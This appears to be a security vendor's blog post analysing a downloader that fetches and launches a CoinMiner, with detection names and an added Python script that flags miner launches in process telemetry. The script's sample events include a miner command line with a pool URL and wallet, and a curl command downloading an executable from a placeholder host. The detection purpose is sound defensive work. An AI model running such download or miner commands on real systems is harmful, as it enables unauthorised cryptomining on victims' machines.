Recently, X-Sec Labs caught a downloader which can download CoinMiner from an HTTP File Server (HFS).
First, let’s load it into Exeinfo PE.
But we can also open it with Notepad 😉
From these three images, we can guess that the core function downloads a file from a specific URL and then runs it with extra arguments. CoinMiner usually takes such arguments to set the mining pool and the related account.
Now we can manually download the related file.
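The behaviour described above (a dropped binary launched with a pool URL and an account) is what a defender would look for in process-creation telemetry. The following is an added example, not code from X-Sec Labs or from the sample: it scans constructed process-creation events for a mining-pool URL and a pool-account switch on the command line, and notes when the image runs from a user-writable path. The `stratum+tcp://` scheme and the `-u`/`--user` switch are assumptions drawn from common miner command lines; the page itself names no specific miner or switches.

```python
import re

# Constructed sample of process-creation events (not from the page): a downloader
# launching the fetched binary with mining-pool arguments, plus benign noise.
SAMPLE_EVENTS = [
    {"parent": r"C:\Users\Public\dl.exe", "image": r"C:\Users\Public\svc.exe",
     "cmdline": r"C:\Users\Public\svc.exe -o stratum+tcp://pool.example.invalid:3333 -u 4AexampleWalletAddress -p x"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Program Files\Editor\editor.exe",
     "cmdline": r'"C:\Program Files\Editor\editor.exe" notes.txt'},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe http://files.example.invalid:8080/update.exe -o C:\Temp\update.exe"},
]

# Pool URL scheme used by most miners (assumption: the page names no specific miner).
POOL_URL = re.compile(r"\bstratum\+(?:tcp|ssl)://[\w.-]+:\d+", re.IGNORECASE)
# -u / --user is the usual switch carrying the pool account or wallet (same assumption).
ACCOUNT_SWITCH = re.compile(r"(?:^|\s)(?:-u|--user)[=\s]+\S+", re.IGNORECASE)
# Executable launched from a user-writable location, typical for a dropped payload.
USER_WRITABLE_PATH = re.compile(
    r"^C:\\(?:Users\\Public|Temp|Users\\[^\\]+\\AppData)\\", re.IGNORECASE)


def classify(event: dict) -> list:
    """Return the list of indicator names a single process-creation event triggers."""
    hits = []
    cmd = event["cmdline"]
    if POOL_URL.search(cmd):
        hits.append("mining_pool_url")
    if ACCOUNT_SWITCH.search(cmd):
        hits.append("pool_account_switch")
    if USER_WRITABLE_PATH.match(event["image"]):
        hits.append("user_writable_image_path")
    return hits


def find_suspicious(events: list) -> list:
    """Flag events that carry both a pool URL and an account switch as probable CoinMiner launches."""
    required = {"mining_pool_url", "pool_account_switch"}
    return [e for e in events if required <= set(classify(e))]


if __name__ == "__main__":
    for ev in find_suspicious(SAMPLE_EVENTS):
        print("suspicious:", ev["image"], "<-", ev["parent"], classify(ev))
```

The image-path indicator is kept separate from the verdict on purpose: a legitimately installed miner can also run from a user profile, so it is recorded as context rather than used as a trigger.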
X-Sec Antivirus Detection:
Cloud Engine: Cloud:Trojan.Win32.CoinMiner (for the downloader and the downloaded file)
Local Engine: Trojan.Win32.CoinMiner.Ah (only for the downloader)
Required Virus Definition Version: 2017.12.07.01 (not yet released when this blog was posted)